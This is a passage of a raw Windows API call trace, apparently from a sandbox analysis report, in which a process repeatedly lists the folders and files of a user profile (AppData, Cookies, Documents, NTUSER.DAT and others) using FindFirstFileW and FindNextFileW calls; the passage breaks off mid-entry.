lpFindFileData=0x71ef0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b2f0 [0150.822] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0150.823] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0150.823] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0150.823] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0150.824] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0150.824] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc9a83100, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xc9a83100, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0150.824] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda20f0c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda20f0c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0150.824] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0150.825] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0150.825] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0150.825] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0150.825] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda2814e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda2814e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0150.826] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0150.826] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0150.826] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0150.826] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8f389c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0150.827] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0150.827] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0150.827] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0151.496] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0151.496] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0151.496] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda9cb840, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda9cb840, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0151.496] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0151.496] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0151.496] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0151.497] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0151.497] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0151.497] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0151.497] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0151.497] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda9332c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda9332c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0151.497] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda9332c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda9332c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0151.498] FindClose (in: hFindFile=0x77b2f0 | out: hFindFile=0x77b2f0) returned 1 [0151.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef34c) returned 1 [0151.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef358) returned 1 [0151.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef38c) returned 1 [0151.498] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x71eee94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0151.498] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", nBufferLength=0x105, lpBuffer=0x71eee68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpFilePart=0x0) returned 0x1e [0151.498] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x71ef0b4 | out: lpFindFileData=0x71ef0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b2f0 [0151.498] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.499] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0151.499] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0151.499] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0151.499] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0151.499] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc9a83100, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xc9a83100, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0151.499] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda20f0c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda20f0c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0151.499] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0151.500] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0151.500] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0151.500] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0151.500] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: 